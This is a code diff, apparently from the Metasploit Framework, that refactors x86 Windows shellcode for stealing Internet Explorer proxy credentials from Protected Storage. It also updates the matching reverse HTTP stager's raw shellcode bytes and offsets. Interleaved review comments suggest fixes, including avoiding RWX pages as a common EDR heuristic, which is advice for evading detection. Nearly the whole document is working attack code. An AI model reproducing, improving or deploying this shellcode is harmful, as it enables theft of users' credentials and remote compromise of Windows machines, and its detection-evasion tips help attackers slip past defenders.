diff --git a/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm b/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm
old mode 100755
new mode 100644
index 978272be2c..acd1afc053
--- a/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_get_pstore_creds.asm
@@ -6,66 +6,32 @@ [BITS 32]
 ; Input: EBP must be the address of 'api_call'
-; Output: top element of stack will be pointer to null-terminated password and second
-; will be pointer to null-terminated username of the Proxy saved in IE
-
-
-;mov edx, "1_r?"
-;call print_eax
+; Output: top element of stack will be pointer to null-terminated password and
+; second will be pointer to null-terminated username of the Proxy saved in IE
+pushad
 jmp after_functions
-alloc_memory: ; returns address to allocation in eax
+alloc_memory: ; returns address to allocation in eax
 push byte 0x40 ; PAGE_EXECUTE_READWRITE
 push 0x1000 ; MEM_COMMIT
- push 0x00001000 ; allocate 1000 Byte for each variable (could be less I guess)
+ push 0x1000 ; allocate 1000 byte for each variable (could be less)
 push 0 ; NULL as we dont care where the allocation is
 push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
 call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXE$
- ret
-
-after_functions:
-
-; allocate memory for variables
-
- alloc_ppsDataLen:
- call alloc_memory
- push eax
-
- alloc_ppsData:
- call alloc_memory
- push eax
-
- alloc_pitemName:
- call alloc_memory
- push eax
-
- alloc_pspEnumItems:
- call alloc_memory
- push eax
-
- alloc_psubTypeGUID:
- call alloc_memory
- push eax
-
- alloc_pEnumSubtypes:
- call alloc_memory
- push eax
-
- alloc_pTypeGUID:
- call alloc_memory
- push eax
-
- alloc_pEnumPStoreTypes:
- call alloc_memory
- push eax ; save on stack
-
- alloc_pPStore:
- call alloc_memory
- push eax ; save on stack
-
-
-load_pstorec: ; loads the pstorec.dll
+ ret ;
+ ;
+after_functions: ;
+ ;
+ ; allocate memory for variables and save pointers on stack
+ mov bl, 9 ;
+ alloc_loop: ;
+ call alloc_memory ;
+ push eax ; save allocation address on stack
+ dec bl ;
+ jnz alloc_loop ;
+ ;
+load_pstorec: ; loads the pstorec.dll
 push 0x00636572 ; Push the bytes 'pstorec',0 onto the stack.
 push 0x6f747370 ; ...
 push esp ; Push a pointer to the 'pstorec',0 string on the stack.
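Review bot: The nine buffers carved out by alloc_loop only ever hold pointers, GUIDs and the returned credential string, yet the shared alloc_memory helper still requests them with `push byte 0x40 ; PAGE_EXECUTE_READWRITE`; `push byte 0x04 ; PAGE_READWRITE` is sufficient for data and avoids nine fresh RWX pages, which are a common EDR heuristic. The size comment is also wrong: 0x1000 is 4096 bytes, not 1000, so the line should read `push 0x1000 ; allocate 0x1000 (4096) bytes per variable (could be less)`. The loop pushes eax without testing it, so a failed VirtualAlloc leaves a NULL on the stack that later code dereferences; if that is an accepted trade-off for shellcode size, a one-line comment at alloc_loop saying so would help. The code that consumes these nine pointers and the registers saved by the new pushad is outside the hunk.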
@@ -73,190 +39,171 @@ load_pstorec: ; loads the pstorec.dll
 call ebp ; LoadLibraryA( "pstorec" )
 ; this should leave a handle to the pstorec
 ; DLL-Module in eax
- mov ebx, eax ; save handle in ebx
- pop edx ; remove string from stack
+ pop edx ; remove 'pstorec' string from stack
 pop edx
-
-
-PStoreCreateInstance_PStore:; returns address to PStore (00942524) in pPStore (0012FEF4)
- pop edi ; pop pPstore
- push edi ; restore stack
-
- push 0
- push 0
- push 0
+
+PStoreCreateInstance_PStore:
+ ; returns address to PStore in pPStore
+ pop edi ; pop pPstore
+ push edi ; restore stack
+ ;
+ push 0 ;
+ push 0 ;
+ push 0 ;
 push edi ; arg4: pPstore
 push 0x2664BDDB ; hash ( "pstorec.dll", "PStoreCreateInstance" )
 call ebp ; PstoreCreateInstance(address, 0, 0, 0)
-
-PStore.EnumTypes: ; returns address to EnumPStoreTypes (00942568) in pEnumPStoreTypes (0012FEE8)
- pop eax ; pop pPstore
- pop edx ; pop pEnumPstoreTypes
- push edx ; push them again
- push eax
-
- push edx ; arg1: pEnumPstoreTypes
- push 0 ; arg2: NULL
- push 0 ; arg3: NULL
- mov eax, [eax] ; load base address of PStore in eax
- push eax ; push base address of PStore (this)
- mov edx, [eax] ; get function address of IPStore::EnumTypes in pstorec.dll
- mov edx, [edx+0x38] ;&EnumTypes() = *(*(&PStore)+0x38)
- ;add edx, 0x00005586
- call edx ; call IPStore::EnumTypes
-
+ ;
+PStore.EnumTypes: ; returns address to EnumPStoreTypes in pEnumPStoreTypes
+ pop eax ; pop pPstore
+ pop edx ; pop pEnumPstoreTypes
+ push edx ; restore stack
+ push eax ;
+ ;
+ push edx ; arg1: pEnumPstoreTypes
+ push 0 ; arg2: NULL
+ push 0 ; arg3: NULL
+ mov eax, [eax] ; load base address of PStore in eax
+ push eax ; push base address of PStore (this)
+ mov edx, [eax] ; get function address of IPStore::EnumTypes in pstorec.dll
+ mov edx, [edx+0x38] ; &EnumTypes() = *(*(&PStore)+0x38)
+ call edx ; call IPStore::EnumTypes
 mov edi, 0x5e7e8100 ; Value of pTypeGUID if Password is IE:Password-Protected
-
+ ;
 EnumPStoreTypes.raw_Next:
- pop eax ; pop pPStore
- pop edx ; pop pEnumPStoreTypes
- pop ecx ; pop pTypeGUID
- push ecx ; push them again
- push edx
- push eax
-
- push 0 ; arg1: NULL
- push ecx ; arg2: pTypeGUID
- push 1 ; arg3: 1
- mov edx, [edx] ; load base address of EnumPStoreTypes (00942568)
- push edx ; push base address of EnumPStoreTypes (this)
- mov edx, [edx] ; get function address of EnumPStoreTypes::raw_Next in pstorec.dll
- mov edx, [edx+0x0C] ; &RawNext = *(*(*(&EnumPStoreTypes))+0x0C)
- ;add edx, 0x00004E4F
- call edx ; call EnumPStoreTypes::raw_Next
-
- mov eax, [esp+8]
- mov eax, [eax]
-
- mov edx, 0x00000000
- cmp edx, eax
- jz no_auth ; no Password found
- cmp edi, eax ; do this until TypeGUID indicates "IE Password Protected sites"
+ pop eax ; pop pPStore
+ pop edx ; pop pEnumPStoreTypes
+ pop ecx ; pop pTypeGUID
+ push ecx ; restore stack
+ push edx ;
+ push eax ;
+ ;
+ push 0 ; arg1: NULL
+ push ecx ; arg2: pTypeGUID
+ push 1 ; arg3: 1
+ mov edx, [edx] ; load base address of EnumPStoreTypes
+ push edx ; push base address of EnumPStoreTypes (this)
+ mov edx, [edx] ; get function address of EnumPStoreTypes::raw_Next in pstorec.dll
+ mov edx, [edx+0x0C] ; &RawNext = *(*(*(&EnumPStoreTypes))+0x0C)
+ call edx ; call EnumPStoreTypes::raw_Next
+ ;
+ mov eax, [esp+8] ;
+ mov eax, [eax] ;
+ ;
+ test eax, eax ;
+ jz no_auth ; no Password found
+ cmp edi, eax ; do this until TypeGUID indicates "IE Password Protected sites"
 jne EnumPStoreTypes.raw_Next
-
+ ;
 PStore.EnumSubtypes: ; returns address to EnumSubtypes () in pEnumSubtypes ()
 pop eax ; pop pPstore
 pop edx ; pop pEnumPstoreTypes
- pop ecx ; pop pTypeGUID
- pop edi ; pop pEnumSubtypes
+ pop ecx ; pop pTypeGUID
+ pop edi ; pop pEnumSubtypes
 push edi ; restore stack
- push ecx
- push edx
- push eax
-
+ push ecx ;
+ push edx ;
+ push eax ;
+ ;
 push edi ; arg1: pEnumSubtypes
 push 0 ; arg2: NULL
- push ecx ; arg3: pTypeGUID
+ push ecx ; arg3: pTypeGUID
 push 0 ; arg4: NULL
 mov eax, [eax] ; load base address of PStore in eax
 push eax ; push base address of PStore (this)
 mov edx, [eax] ; get function address of IPStore::EnumSubtypes in pstorec.dll
 mov edx, [edx+0x3C] ; &Pstore.EnumSubTypes() = *(*(*(&PStore))+0x3C)
- ;add edx, 0x0000560C
 call edx ; call IPStore::EnumSubtypes
-
+ ;
 EnumSubtypes.raw_Next:
 mov eax, [esp+0x0C] ; pop pEnumSubtypes
 mov edx, [esp+0x10] ; pop psubTypeGUID
-
- push 0 ; arg1: NULL
- push edx ; arg2: psubTypeGUID
- push 1 ; arg3: 1
- mov eax, [eax] ; load base address of EnumSubtypes in eax
- push eax ; push base address of EnumSubtypes (this)
- mov edx, [eax] ; get function address of raw_Next in pstorec.dll
- mov edx, [edx+0x0C] ; &(EnumSubtypes.raw_Next) = *(*(&EnumSubtypes)+0x0C)
- ;add edx, 0x00004E4F
- call edx ; call EnumSubtypes.raw_Next
-
+ ;
+ push 0 ; arg1: NULL
+ push edx ; arg2: psubTypeGUID
+ push 1 ; arg3: 1
+ mov eax, [eax] ; load base address of EnumSubtypes in eax
+ push eax ; push base address of EnumSubtypes (this)
+ mov edx, [eax] ; get function address of raw_Next in pstorec.dll
+ mov edx, [edx+0x0C] ; &(EnumSubtypes.raw_Next) = *(*(&EnumSubtypes)+0x0C)
+ call edx ; call EnumSubtypes.raw_Next
+ ;
 PStore.EnumItems:
- pop eax ; pop pPstore
- pop ecx
- pop edx ; pop pTypeGUID
- push edx ; restore stack
- push ecx
- push eax
+ pop eax ; pop pPstore
+ pop ecx ;
+ pop edx ; pop pTypeGUID
+ push edx ; restore stack
+ push ecx ;
+ push eax ;
 mov ecx, [esp+0x10] ; pop psubTypeGUID
 mov edi, [esp+0x14] ; pop pspEnumItems
-
- push edi ; arg1: pspEnumItems
- push 0 ; arg2: NULL
- push ecx ; arg3: psubTypeGUID
- push edx ; arg4: pTyoeGUID
- push 0 ; arg5: NULL
- mov eax, [eax] ; load base address of PStore in eax
- push eax ; push base address of PStore (this)
- mov edx, [eax] ; get function address of IPStore::Enumitems in pstorec.dll
- ;mov edx, [edx]
- mov edx, [edx+0x54]
- ;add edx, 0x000056A0
+ ;
+ push edi ; arg1: pspEnumItems
+ push 0 ; arg2: NULL
+ push ecx ; arg3: psubTypeGUID
+ push edx ; arg4: pTyoeGUID
+ push 0 ; arg5: NULL
+ mov eax, [eax] ; load base address of PStore in eax
+ push eax ; push base address of PStore (this)
+ mov edx, [eax] ; get function address of IPStore::Enumitems in pstorec.dll
+ mov edx, [edx+0x54] ;
 call edx ; call IPStore::Enumitems
-
+ ;
 spEnumItems.raw_Next:
 mov eax, [esp+0x14] ; pop pspEnumItems
 mov ecx, [esp+0x18] ; pop pitemName
-
- push 0 ; arg1: NULL
- push ecx ; arg2: pitemName
- push 1 ; arg3: 1
- mov eax, [eax] ; load base address of spEnumItems in eax
- push eax ; push base addres of spEnumItems (this)
- mov edx, [eax] ; get function address of raw_Next in pstorec.dll
- mov edx, [edx+0x0C]
- ;add edx, 0x000048D1
- call edx
-
+ ;
+ push 0 ; arg1: NULL
+ push ecx ; arg2: pitemName
+ push 1 ; arg3: 1
+ mov eax, [eax] ; load base address of spEnumItems in eax
+ push eax ; push base addres of spEnumItems (this)
+ mov edx, [eax] ; get function address of raw_Next in pstorec.dll
+ mov edx, [edx+0x0C] ;
+ call edx ;
+ ;
 PStore.ReadItem:
- pop eax ; pop pPStore
- push eax
-
- push 0 ; arg1: NULL
- push 0 ; arg2: NULL (stiinfo not needed)
+ pop eax ; pop pPStore
+ push eax ;
+ ;
+ push 0 ; arg1: NULL
+ push 0 ; arg2: NULL (stiinfo not needed)
 mov ecx, [esp+0x24] ; pop ppsData (8. Element)
- push ecx ; arg3: ppsData
+ push ecx ; arg3: ppsData
 mov ecx, [esp+0x2C] ; pop ppsDataLen
- push ecx ; arg4: ppsDataLen (not needed?)
+ push ecx ; arg4: ppsDataLen (not needed?)
 mov ecx, [esp+0x28] ; pop pitemName (7. Element)
- mov ecx, [ecx]
- push ecx ; arg5: pitemName
+ mov ecx, [ecx] ;
+ push ecx ; arg5: pitemName
 mov ecx, [esp+0x24] ; pop psubTypeGUID (5. Element)
- push ecx ; arg6: psubTypeGUID
+ push ecx ; arg6: psubTypeGUID
 mov ecx, [esp+0x20] ; pop pTypeGUID (3. Element)
- push ecx ; arg7: pTypeGUID
- push 0 ; arg8: NULL
- mov eax, [eax] ; load base address of PStore in eax
- push eax ; push base addres of PStore (this)
- mov edx, [eax] ; get function address of IPStore::ReadItem in pstorec.dll
- mov edx, [edx+0x44]
- ;add edx, 0x000042B6
- call edx
-
+ push ecx ; arg7: pTypeGUID
+ push 0 ; arg8: NULL
+ mov eax, [eax] ; load base address of PStore in eax
+ push eax ; push base addres of PStore (this)
+ mov edx, [eax] ; get function address of IPStore::ReadItem in pstorec.dll
+ mov edx, [edx+0x44] ;
+ call edx ;
+ ;
 split_user_pass:
 mov eax, [esp+0x1C] ; eax = ppsData
- mov eax, [eax] ; now eax contains pointer to "user:pass"
- push eax ; push pointer to user
+ mov eax, [eax] ; now eax contains pointer to "user:pass"
+ push eax ; push pointer to user
 mov cl, byte 0x3a ; load ":" in ecx
 mov dl, byte [eax] ; load first byte of ppsData in edx
- cmp cl, dl
- jz no_auth
- loop_split:
- inc eax
- mov dl, byte [eax]
- cmp cl, dl
- jnz loop_split ; increase eax until it points to ":"
-
+ cmp cl, dl ;
+ jz no_auth ;
+ loop_split: ;
+ inc eax ;
+ mov dl, byte [eax] ;
+ cmp cl, dl ;
+ jnz loop_split ; increase eax until it points to ":"
+ ;
 mov [eax], byte 0x00 ; replace ":" with 00
- inc eax
- push eax ; push pointer to pass
-
+ inc eax ;
+ push eax ; push pointer to pass
+ ;
 no_auth:
-; mov edi, 0x00000006 ; counter for loop
-;free_memory: ; doesn't work yet
-; push 0x00008000
-; push 0x00000000
-; push 0x300F2F0B ; hash( "kernel32.dll", "VirtualFree" )
-; call ebp
-; dec di
-; jnz free_memory
diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
index 7f256ff57e..0be8d5f383 100644
--- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
+++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb
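Review bot: loop_split still has no terminator check: `inc eax / mov dl, byte [eax] / cmp cl, dl / jnz loop_split` advances until it finds a ':' and never tests for the string's NUL, so a credential item that contains no colon reads past the end of the buffer ReadItem returned and then writes a 0x00 wherever a ':' is eventually found. The existing first-byte check only catches a leading ':', so add `test dl, dl` and `jz no_auth` between the byte load and the compare inside loop_split. Both that existing `jz no_auth` after `push eax ; push pointer to user` and this new exit leave the user pointer pushed without a password pointer, so the stack shape differs from the success path and from the earlier no_auth jump in EnumPStoreTypes.raw_Next; the consumer of this block is outside the hunk and should be checked against that. With the commented-out free_memory block removed, the decrypted credential also stays resident in the allocated pages after use, which is worth a comment at no_auth so nobody assumes it is wiped.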
@@ -33,16 +33,16 @@ module Metasploit3
 {
 'Offsets' =>
 {
- # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
- # 'EXITFUNC' => [ 290, 'V' ],
- 'LPORT' => [ 547, 'v' ], # Not a typo, really little endian
+ 'EXITFUNC' => [ 579, 'V' ],
+ 'LPORT' => [ 499, 'v' ], # Not a typo, really little endian
 },
 'Payload' =>
-
+# Built on Thu Mar 6 02:37:12 2014
+
 # Name: stager_reverse_http_proxy_pstore
-# Length: 697 bytes
-# LEPort Offset: 547
-# ExitFunk Offset: 627
+# Length: 649 bytes
+# LEPort Offset: 499
+# ExitFunk Offset: 579
 "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
 "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
 "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
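Review bot: Re-enabling `'EXITFUNC' => [ 579, 'V' ]` also drops the note that this stager MUST use ExitProcess to work on WoW64, and nothing in the hunk shows that constraint being addressed, so if it still holds a user selecting another EXITFUNC now gets a payload that is patched but may not be safe on WoW64. Either keep the caveat next to the offset, e.g. `# NOTE: on WoW64 this stager is only known to work with EXITFUNC=process`, or point to the change that lifted the limitation. The new offsets 579/499 match the regenerated "LEPort Offset"/"ExitFunk Offset" header comments, which is the only consistency check visible here; the enclosing merge_info hash opens before the hunk.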
@@ -52,18 +52,15 @@ module Metasploit3 "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + -"\xEB\x16\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x10\x00\x00\x6A\x00" + -"\x68\x58\xA4\x53\xE5\xFF\xD5\xC3\xE8\xE5\xFF\xFF\xFF\x50\xE8\xDF" + -"\xFF\xFF\xFF\x50\xE8\xD9\xFF\xFF\xFF\x50\xE8\xD3\xFF\xFF\xFF\x50" + -"\xE8\xCD\xFF\xFF\xFF\x50\xE8\xC7\xFF\xFF\xFF\x50\xE8\xC1\xFF\xFF" + -"\xFF\x50\xE8\xBB\xFF\xFF\xFF\x50\xE8\xB5\xFF\xFF\xFF\x50\x68\x72" + -"\x65\x63\x00\x68\x70\x73\x74\x6F\x54\x68\x4C\x77\x26\x07\xFF\xD5" + -"\x89\xC3\x5A\x5A\x5F\x57\x6A\x00\x6A\x00\x6A\x00\x57\x68\xDB\xBD" + -"\x64\x26\xFF\xD5\x58\x5A\x52\x50\x52\x6A\x00\x6A\x00\x8B\x00\x50" + -"\x8B\x10\x8B\x52\x38\xFF\xD2\xBF\x00\x81\x7E\x5E\x58\x5A\x59\x51" + -"\x52\x50\x6A\x00\x51\x6A\x01\x8B\x12\x52\x8B\x12\x8B\x52\x0C\xFF" + -"\xD2\x8B\x44\x24\x08\x8B\x00\xBA\x00\x00\x00\x00\x39\xC2\x0F\x84" + -"\xB1\x00\x00\x00\x39\xC7\x75\xD4\x58\x5A\x59\x5F\x57\x51\x52\x50" + +"\x60\xEB\x16\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x10\x00\x00\x6A" + +"\x00\x68\x58\xA4\x53\xE5\xFF\xD5\xC3\xB3\x09\xE8\xE3\xFF\xFF\xFF" + +"\x50\xFE\xCB\x75\xF6\x68\x72\x65\x63\x00\x68\x70\x73\x74\x6F\x54" + +"\x68\x4C\x77\x26\x07\xFF\xD5\x5A\x5A\x5F\x57\x6A\x00\x6A\x00\x6A" + +"\x00\x57\x68\xDB\xBD\x64\x26\xFF\xD5\x58\x5A\x52\x50\x52\x6A\x00" + +"\x6A\x00\x8B\x00\x50\x8B\x10\x8B\x52\x38\xFF\xD2\xBF\x00\x81\x7E" + +"\x5E\x58\x5A\x59\x51\x52\x50\x6A\x00\x51\x6A\x01\x8B\x12\x52\x8B" + +"\x12\x8B\x52\x0C\xFF\xD2\x8B\x44\x24\x08\x8B\x00\x85\xC0\x0F\x84" + +"\xB1\x00\x00\x00\x39\xC7\x75\xD9\x58\x5A\x59\x5F\x57\x51\x52\x50" + "\x57\x6A\x00\x51\x6A\x00\x8B\x00\x50\x8B\x10\x8B\x52\x3C\xFF\xD2" + "\x8B\x44\x24\x0C\x8B\x54\x24\x10\x6A\x00\x52\x6A\x01\x8B\x00\x50" + "\x8B\x10\x8B\x52\x0C\xFF\xD2\x58\x59\x5A\x52\x51\x50\x8B\x4C\x24" + 
@@ -86,11 +83,7 @@ module Metasploit3
 "\x68\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53" +
 "\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF" +
 "\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5E" +
-"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"
-
-
-
- }
+"\x5E\x5E\x59\x5A\xE8\x60\xFF\xFF\xFF"}
 ))
 end